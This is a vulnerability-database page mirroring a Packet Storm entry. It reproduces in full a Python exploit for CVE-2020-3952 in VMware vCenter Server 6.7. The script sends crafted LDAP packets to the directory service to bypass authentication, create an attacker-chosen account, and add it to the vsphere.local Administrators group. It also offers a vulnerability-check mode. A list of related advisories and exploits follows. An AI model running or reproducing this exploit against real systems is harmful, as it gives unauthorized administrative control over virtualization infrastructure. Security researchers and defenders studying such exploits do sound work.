Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormPhotubiasPACKETSTORM:157896
HistoryJun 02, 2020 - 12:00 a.m.

VMware vCenter Server 6.7 Authentication Bypass

2020-06-0200:00:00
Photubias
packetstormsecurity.com
394
JSON
`# Exploit Title: VMware vCenter Server 6.7 - Authentication Bypass  
# Date: 2020-06-01  
# Exploit Author: Photubias  
# Vendor Advisory: [1] https://www.vmware.com/security/advisories/VMSA-2020-0006.html  
# Version: vCenter Server 6.7 before update 3f  
# Tested on: vCenter Server Appliance 6.7 RTM (updated from v6.0)  
# CVE: CVE-2020-3952  
  
#!/usr/bin/env python3  
  
'''  
Copyright 2020 Photubias(c)   
This program is free software: you can redistribute it and/or modify  
it under the terms of the GNU General Public License as published by  
the Free Software Foundation, either version 3 of the License, or  
(at your option) any later version.  
  
This program is distributed in the hope that it will be useful,  
but WITHOUT ANY WARRANTY; without even the implied warranty of  
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  
GNU General Public License for more details.  
  
You should have received a copy of the GNU General Public License  
along with this program. If not, see <http://www.gnu.org/licenses/>.  
  
Based (and reverse engineerd from): https://github.com/guardicore/vmware_vcenter_cve_2020_3952  
  
File name CVE-2020-3592.py  
written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be  
  
## Vulnerable setup (requirements): vCenter Server 6.7 that was upgraded from 6.x  
  
This is a native implementation without requirements, written in Python 3.  
Works equally well on Windows as Linux (as MacOS, probably ;-)  
  
Features: exploit + vulnerability checker  
'''  
  
import binascii, socket, sys, string, random  
  
## Default vars; change at will  
_sIP = '192.168.50.35'  
_iPORT = 389  
_iTIMEOUT = 5  
  
def randomString(iStringLength=8):  
#sLetters = string.ascii_lowercase  
sLetters = string.ascii_letters  
return ''.join(random.choice(sLetters) for i in range(iStringLength))  
  
def getLengthPrefix(sData, sPrefix, hexBytes=1): ## sData is hexlified  
## This will calculate the length of the string, and verify if an additional '81' or '82' prefix is needed  
sReturn = sPrefix  
if (len(sData) / 2 ) > 255:  
sReturn += b'82'  
hexBytes = 2  
elif (len(sData) /2 ) >= 128:  
sReturn += b'81'  
sReturn += f"{int(len(sData)/2):#0{(hexBytes*2)+2}x}"[2:].encode()  
return sReturn  
  
def buildBindRequestPacket(sUser, sPass):  
sUser = binascii.hexlify(sUser.encode())  
sPass = binascii.hexlify(sPass.encode())  
## Packet Construction  
sPacket = getLengthPrefix(sPass, b'80') + sPass  
sPacket = getLengthPrefix(sUser, b'04') + sUser + sPacket  
sPacket = b'020103' + sPacket  
sPacket = getLengthPrefix(sPacket, b'60') + sPacket  
sPacket = b'020101' + sPacket  
sPacket = getLengthPrefix(sPacket, b'30') + sPacket  
#print(sPacket)  
return binascii.unhexlify(sPacket)   
  
def buildUserCreatePacket(sUser, sPass):  
sUser = binascii.hexlify(sUser.encode())  
sPass = binascii.hexlify(sPass.encode())  
def createAttribute(sName, sValue):  
sValue = getLengthPrefix(sValue, b'04') + sValue  
sName = getLengthPrefix(sName, b'04') + sName  
  
sReturn = getLengthPrefix(sValue, b'31') + sValue  
sReturn = sName + sReturn  
sReturn = getLengthPrefix(sReturn, b'30') + sReturn  
return sReturn  
  
def createObjectClass():  
sReturn = getLengthPrefix(binascii.hexlify(b'top'), b'04') + binascii.hexlify(b'top')  
sReturn += getLengthPrefix(binascii.hexlify(b'person'), b'04') + binascii.hexlify(b'person')  
sReturn += getLengthPrefix(binascii.hexlify(b'organizationalPerson'), b'04') + binascii.hexlify(b'organizationalPerson')  
sReturn += getLengthPrefix(binascii.hexlify(b'user'), b'04') + binascii.hexlify(b'user')  
  
sReturn = getLengthPrefix(sReturn, b'31') + sReturn  
sReturn = getLengthPrefix(binascii.hexlify(b'objectClass'), b'04') + binascii.hexlify(b'objectClass') + sReturn  
sReturn = getLengthPrefix(sReturn, b'30') + sReturn  
return sReturn  
  
## Attributes  
sAttributes = createAttribute(binascii.hexlify(b'vmwPasswordNeverExpires'), binascii.hexlify(b'True'))  
sAttributes += createAttribute(binascii.hexlify(b'userPrincipalName'), sUser + binascii.hexlify(b'@VSPHERE.LOCAL'))  
sAttributes += createAttribute(binascii.hexlify(b'sAMAccountName'), sUser)  
sAttributes += createAttribute(binascii.hexlify(b'givenName'), sUser)  
sAttributes += createAttribute(binascii.hexlify(b'sn'), binascii.hexlify(b'vsphere.local'))  
sAttributes += createAttribute(binascii.hexlify(b'cn'), sUser)  
sAttributes += createAttribute(binascii.hexlify(b'uid'), sUser)  
sAttributes += createObjectClass()  
sAttributes += createAttribute(binascii.hexlify(b'userPassword'), sPass)  
## CN  
sCN = binascii.hexlify(b'cn=') + sUser + binascii.hexlify(b',cn=Users,dc=vsphere,dc=local')  
sUserEntry = getLengthPrefix(sCN, b'04') + sCN  
  
## Packet Assembly (bottom up)  
sPacket = getLengthPrefix(sAttributes, b'30') + sAttributes  
sPacket = sUserEntry + sPacket  
sPacket = getLengthPrefix(sPacket, b'02010268', 2) + sPacket  
sPacket = getLengthPrefix(sPacket, b'30') + sPacket  
#print(sPacket)  
return binascii.unhexlify(sPacket)  
  
def buildModifyUserPacket(sUser):  
sFQDN = binascii.hexlify(('cn=' + sUser + ',cn=Users,dc=vsphere,dc=local').encode())  
sCN = binascii.hexlify(b'cn=Administrators,cn=Builtin,dc=vsphere,dc=local')  
sMember = binascii.hexlify(b'member')  
## Packet Construction  
sPacket = getLengthPrefix(sFQDN, b'04') + sFQDN  
sPacket = getLengthPrefix(sPacket, b'31') + sPacket  
sPacket = getLengthPrefix(sMember, b'04') + sMember + sPacket  
sPacket = getLengthPrefix(sPacket, b'0a010030') + sPacket  
sPacket = getLengthPrefix(sPacket, b'30') + sPacket  
sPacket = getLengthPrefix(sPacket, b'30') + sPacket  
sPacket = getLengthPrefix(sCN, b'04') + sCN + sPacket  
sPacket = getLengthPrefix(sPacket, b'02010366') + sPacket  
sPacket = getLengthPrefix(sPacket, b'30') + sPacket  
#print(sPacket)  
return binascii.unhexlify(sPacket)  
  
def performBind(s):  
## Trying to bind, fails, but necessary (even fails when using correct credentials)  
dPacket = buildBindRequestPacket('[email protected]','www.IC4.be')  
s.send(dPacket)  
sResponse = s.recv(1024)  
try:  
sResponse = sResponse.split(b'\x04\x00')[0][-1:]  
sCode = binascii.hexlify(sResponse).decode()  
if sCode == '31': print('[+] Ok, service reachable, continuing')  
else: print('[-] Something went wrong')  
except:  
pass  
return sCode  
  
def performUserAdd(s, sUser, sPass):  
dPacket = buildUserCreatePacket(sUser,sPass)  
s.send(dPacket)  
sResponse = s.recv(1024)  
try:  
sCode = sResponse.split(b'\x04\x00')[0][-1:]  
sMessage = sResponse.split(b'\x04\x00')[1]  
if sCode == b'\x00':  
print('[+] Success! User ' + sUser + '@vsphere.local added with password ' + sPass)  
elif sCode == b'\x32':  
print('[-] Error, this host is not vulnerable (insufficientAccessRights)')  
else:  
if sMessage[2] == b'81': sMessage = sMessage[3:].decode()  
else: sMessage = sMessage[2:].decode()  
print('[-] Error, user not added, message received: ' + sMessage)  
except:  
pass  
return sCode  
  
  
def performUserMod(s, sUser, verbose = True):  
dPacket = buildModifyUserPacket(sUser)  
s.send(dPacket)  
sResponse = s.recv(1024)  
try:  
sCode = sResponse.split(b'\x04\x00')[0][-1:]  
sMessage = sResponse.split(b'\x04\x00')[1]  
if sCode == b'\x00':  
if verbose: print('[+] User modification success (if the above is OK).')  
else:  
if sMessage[2] == b'81': sMessage = sMessage[3:].decode()  
else: sMessage = sMessage[2:].decode()  
if verbose: print('[-] Error during modification, message received: ' + sMessage)  
except:  
pass  
return sCode, sMessage  
  
def performUnbind(s):  
try: s.send(b'\x30\x05\x02\x01\x04\x42\x00')  
except: pass  
  
def main():  
global _sIP, _iPORT, _iTIMEOUT  
_sUSER = 'user_' + randomString(6)  
_sPASS = randomString(8) + '_2020'  
bAdduser = False  
if len(sys.argv) == 1:  
print('[!] No arguments found: python3 CVE-2020-3592.py <dstIP> [<newUsername>] [<newPassword>]')  
print(' Example: ./CVE-2020-3592.py ' + _sIP + ' ' + _sUSER + ' ' + _sPASS)  
print(' Leave username & password empty for a vulnerability check')  
print(' Watch out for vCenter/LDAP password requirements, leave empty for random password')  
print(' But for now, I will ask questions')  
sAnswer = input('[?] Please enter the vCenter IP address [' + _sIP + ']: ')  
if not sAnswer == '': _sIP = sAnswer  
sAnswer = input('[?] Want to perform a check only? [Y/n]: ')  
if sAnswer.lower() == 'n': bAdduser = True  
if bAdduser:  
sAnswer = input('[?] Please enter the new username to add [' + _sUSER + ']: ')  
if not sAnswer == '': _sUSER = sAnswer  
sAnswer = input('[?] Please enter the new password for this user [' + _sPASS + ']: ')  
if not sAnswer == '': _sPASS = sAnswer  
else:  
_sIP = sys.argv[1]  
if len(sys.argv) >= 3:  
_sUSER = sys.argv[2]  
bAdduser = True  
if len(sys.argv) >= 4: _sPASS = sys.argv[3]  
  
## MAIN  
print('')  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.settimeout(_iTIMEOUT)  
try:  
s.connect((_sIP,_iPORT))  
except:  
print('[-] Error: Host ' + _sIP + ':' + str(_iPORT) + ' not reachable')  
sys.exit(1)  
  
performBind(s)  
  
if bAdduser:  
sCode = performUserAdd(s, _sUSER, _sPASS)  
  
if not bAdduser:  
print('[!] Checking vulnerability')  
sCode, sMessage = performUserMod(s, 'Administrator', False)  
if sCode == b'\x32': print('[-] This host is not vulnerable, message: ' + sMessage)  
else: print('[+] This host is vulnerable!')  
else:  
sCode = performUserMod(s, _sUSER)  
  
performUnbind(s)  
  
s.close()  
  
  
if __name__ == "__main__":  
main()  
`

Related

exploitdb 1
0daydb 3
akamaiblog 1
cve 2
metasploit 2
zdt 1
vmware 2
cisa_kev 1
checkpoint_advisories 1
nessus 2
attackerkb 1
prion 2
cisco 1
threatpost 1
rapid7blog 1
exploitdb
exploitdb
VMware vCenter Server 6.7 - Authentication Bypass
2020-06-01 00:00:00
0daydb
0daydb
VMware vCenter Server 6.7 CVE-2020-3952 - Authentication Bypass
2020-06-03 15:50:27
macOS/x64 zsh RickRolling - Shellcode
2020-06-02 13:54:55
QuickBox Pro 2.1.8 CVE-2020-13448 - Remote Code Execution
2020-06-03 15:51:53
akamaiblog
akamaiblog
What?s a 10? Pwning vCenter with CVE-2020-3952
2020-04-15 18:47:00
cve
cve
CVE-2020-3952
2020-04-10 14:15:00
CVE-2020-3592
2020-11-06 19:15:00
metasploit
metasploit
VMware vCenter Server vmdir Authentication Bypass
2020-04-22 22:38:11
VMware vCenter Server vmdir Information Disclosure
2020-04-22 22:38:12
zdt
zdt
VMware vCenter Server 6.7 - Authentication Bypass Exploit
2020-06-01 00:00:00
vmware
vmware
VMware vCenter Server updates address sensitive information disclosure vulnerability in the VMware Directory Service (vmdir) (CVE-2020-3952)
2020-04-09 00:00:00
VMware vCenter Server updates address sensitive information disclosure vulnerability in the VMware Directory Service (vmdir) (CVE-2020-3952)
2020-04-09 00:00:00
cisa_kev
cisa_kev
VMware vCenter Server Information Disclosure Vulnerability
2021-11-03 00:00:00
checkpoint_advisories
checkpoint_advisories
VMware VCenter Server Directory Service Authentication Bypass (CVE-2020-3952)
2020-10-26 00:00:00
nessus
nessus
VMware vCenter Server 6.7 Sensitive Information Disclosure Vulnerability (VMSA-2020-0006)
2020-04-13 00:00:00
Cisco SD-WAN vManage Software Authorization Bypass (cisco-sa-vmanuafw-ZHkdGGEy)
2020-11-10 00:00:00
attackerkb
attackerkb
CVE-2020-3952 - VMware vCenter Server vmdir Information Disclosure
2020-04-10 00:00:00
prion
prion
Design/Logic Flaw
2020-04-10 14:15:00
Authorization
2020-11-06 19:15:00
cisco
cisco
Cisco SD-WAN vManage Software Authorization Bypass Vulnerability
2020-11-04 16:00:00
threatpost
threatpost
Critical VMware Bug Opens Up Corporate Treasure to Hackers
2020-04-10 17:19:57
rapid7blog
rapid7blog
Metasploit Weekly Wrap-Up
2022-01-14 19:00:29
JSON
Related for PACKETSTORM:157896
exploitdb10daydb3akamaiblog1cve2metasploit2zdt1vmware2cisa_kev1checkpoint_advisories1nessus2attackerkb1prion2cisco1threatpost1rapid7blog1